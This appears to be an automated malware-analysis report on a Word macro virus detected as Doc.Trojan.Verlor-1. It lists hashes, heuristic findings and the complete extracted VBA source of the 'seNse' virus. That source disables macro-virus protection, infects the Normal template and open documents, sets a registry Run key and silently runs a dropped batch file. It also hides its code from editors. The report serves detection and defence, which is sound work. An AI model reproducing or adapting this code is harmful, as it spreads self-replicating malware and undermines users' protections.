Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 a1652103119dc1ad…

MALICIOUS

Office (OLE)

34.5 KB Created: 1999-07-16 13:41:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: e6fa3fb598313b40637c5dc132f77be7 SHA-1: 3d47fb38aa3e465d04f4e4f0dc76c1d9673d6f42 SHA-256: a1652103119dc1ad155a34393e869fa660f3db7e45e88597d7db8ead754eddec
396 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder T1105 Ingress Tool Transfer

The sample contains critical VBA heuristics indicating the use of Shell() and CreateObject(), along with legacy WordBasic markers. The Auto_Close macro attempts to export a DLL and create a VBScript payload. It then establishes persistence by writing to the registry key 'HKEY_CURRENT_USER\software\microsoft\windows\CurrentVersion\run\seNse' with the value 'C:\Windows\seNse.vbs', and drops 'C:\Windows\seNse.dll'. This indicates a downloader or backdoor functionality.

Heuristics 9

  • ClamAV: Doc.Trojan.Verlor-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Verlor-1
  • VBA macros detected medium 6 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    NTReturn = Shell(windir & "\System\seNse.bat", 0)
  • VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script
    Options.VirusProtection = False: Options.ConfirmConversions = False: Options.SaveNormalPrompt = False
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Print #1, "Set WordObj = CreateObject(" & Chr(34) & "Word.Application" & Chr(34) & ")"
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Auto_Close macro low OLE_VBA_AUTOCLOSE
    Auto_Close macro
    Matched line in script
    Sub AutoClose()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    windir = Environ("windir")
  • Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5477 bytes
SHA-256: ee74fcaf531b493446464f90ba3f42b3a96e196ce949e2422190e94764fef076
Detection
ClamAV: Doc.Trojan.Verlor-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "seNse"
Sub AutoExec()
 Call Stealth
End Sub
Sub AutoClose()
On Error Resume Next

'MyName = seNse
'WrittenBy = f0re [UC/Skamerwerks/DVC]
'SpecialTanksTo = Flitnic
'Version = .C (1.1)

Options.VirusProtection = False: Options.ConfirmConversions = False: Options.SaveNormalPrompt = False
windir = Environ("windir")

If Dir(NormalTemplate.FullName) = "" Then GoTo EndSub
SetAttr NormalTemplate.FullName, vbNormal

If NormalTemplate.VBProject.VBComponents.Item("seNse").CodeModule.Lines(7, 1) <> "'MyName = seNse" Then
ActiveDocument.VBProject.VBComponents("seNse").Export (windir & "\tempad.dll")
NormalTemplate.VBProject.VBComponents.import (windir & "\tempad.dll")
NormalTemplate.Save
End If
If ActiveDocument.VBProject.VBComponents.Item("seNse").CodeModule.Lines(7, 1) <> "'MyName = seNse" Then
NormalTemplate.VBProject.VBComponents("seNse").Export (windir & "\tempnt.dll")
ActiveDocument.VBProject.VBComponents.import (windir & "\tempnt.dll")
ActiveDocument.SaveAs ActiveDocument.FullName
End If

If Dir(windir & "\seNse.vbs") <> "" Then Kill (windir & "\seNse.vbs")
If Dir(windir & "\seNse.dll") <> "" Then Kill (windir & "\seNse.dll")

NormalTemplate.VBProject.VBComponents("seNse").Export (windir & "\seNse.dll")
System.PrivateProfileString("", "HKEY_CURRENT_USER\software\microsoft\windows\CurrentVersion\run", "seNse") = windir & "\seNse.vbs"

Open windir & "\seNse.vbs" For Append As #1
Print #1, "On error resume next"
Print #1, "Set WordObj = CreateObject(" & Chr(34) & "Word.Application" & Chr(34) & ")"
Print #1, "WordObj.Options.SaveNormalPrompt = False"
Print #1, "WordObj.NormalTemplate.VBProject.VBComponents.remove WordObj.NormalTemplate.VBProject.VBComponents(" & Chr(34) & "seNse" & Chr(34) & ")"
Print #1, "WordObj.NormalTemplate.save"
Print #1, "WordObj.NormalTemplate.VBProject.VBComponents.import (" & Chr(34) & windir & "\seNse.dll" & Chr(34) & ")"
Print #1, "WordObj.NormalTemplate.save"
Print #1, "set NT = nothing"
Print #1, "WordObj.Quit"
Close #1

EndSub:
End Sub
Sub Stealth()

windir = Environ("windir")
If Dir(windir & "\System\id.sys") <> "" Then Kill windir & "\System\id.sys"
If Dir(windir & "\System\seNse.bat") <> "" Then Kill windir & "\System\seNse.bat"

NormalTemplate.OpenAsDocument
NTAtt = ActiveDocument.ReadOnly
ActiveDocument.SaveAs FileName:=windir & "\System\id.sys", FileFormat:=wdFormatTemplate, AddToRecentFiles:=False, ReadOnlyRecommended:=False
NormalTemplate.Saved = True
ActiveDocument.Saved = True
ActiveDocument.Close

Close #1
Open windir & "\System\seNse.bat" For Append As #1
Print #1, ":Begin"
For i = 1 To 500
Print #1, "rem seNse was coded by f0re [UC/Skamwerks/DVC]"
Next i
Print #1, ":Begin"
Print #1, "Move /y " & Chr(34) & "c:\windll.dat" & Chr(34) & " " & Chr(34) & NormalTemplate.FullName & Chr(34)
Print #1, "If exist c:\windll.dat goto Begin"
Close #1

FileCopy windir & "\System\id.sys", "c:\windll.dat"
NTReturn = Shell(windir & "\System\seNse.bat", 0)
End Sub
Sub ViewVBCode()
On Error Resume Next

NormalTemplate.VBProject.VBComponents("seNse").CodeModule.deletelines 1, NormalTemplate.VBProject.VBComponents("seNse").CodeModule.CountOfLines
NormalTemplate.Saved = True
NormalTemplate.VBProject.VBComponents.Remove NormalTemplate.VBProject.VBComponents("seNse")
NormalTemplate.Saved = True
docnumber = Application.Documents.Count
If docnumber >= 1 Then
 For X = 1 To docnumber
  Documents(X).VBProject.VBComponents("seNse").CodeModule.deletelines 1, Documents(X).VBProject.VBComponents("seNse").CodeModule.CountOfLines
  Documents(X).Saved = True
  Documents(X).VBProject.VBComponents.Remove Documents(X).VBProject.VBComponents("seNse")
  Documents(X).Saved = True
 Next X
End If

Application.ShowVisualBasicEditor = True
End Sub
Sub ToolsMacro()
On Error Resume Next

For X = 1 To NormalTemplate.VBProject.VBComponents("seNse").CodeModule.CountOfLines
 CodeNT = CodeNT & NormalTemplate.VBProject.VBComponents("seNse").CodeModule.Lines(X, 1) & Chr(13)
Next X
NormalTemplate.VBProject.VBComponents("seNse").CodeModule.deletelines 1, NormalTemplate.VBProject.VBComponents("seNse").CodeModule.CountOfLines
NormalTemplate.Saved = True
docnumber = Application.Documents.Count
If docnumber >= 1 Then
 For X = 1 To ActiveDocument.VBProject.VBComponents("seNse").CodeModule.CountOfLines
  CodeAD = CodeAD & ActiveDocument.VBProject.VBComponents("seNse").CodeModule.Lines(X, 1) & Chr(13)
 Next X
 For X = 1 To docnumber
  Documents(X).VBProject.VBComponents("seNse").CodeModule.deletelines 1, Documents(X).VBProject.VBComponents("seNse").CodeModule.CountOfLines
  Documents(X).Saved = True
 Next X
End If

Application.Dialogs(wdDialogToolsMacro).Show

If Application.ShowVisualBasicEditor = False Then
 NormalTemplate.VBProject.VBComponents("seNse").CodeModule.InsertLines 1, CodeNT
 NormalTemplate.Save
 If docnumber >= 1 Then
  For X = 1 To docnumber
   Documents(X).VBProject.VBComponents("seNse").CodeModule.InsertLines 1, CodeAD
   Documents(X).SaveAs Documents(X).FullName
  Next X
 End If
End If
End Sub

'Put this code in a module called "seNse". Experience stealth :) (but again not perfect stealth).

Open this report in the interactive analyzer, or submit your own file for analysis.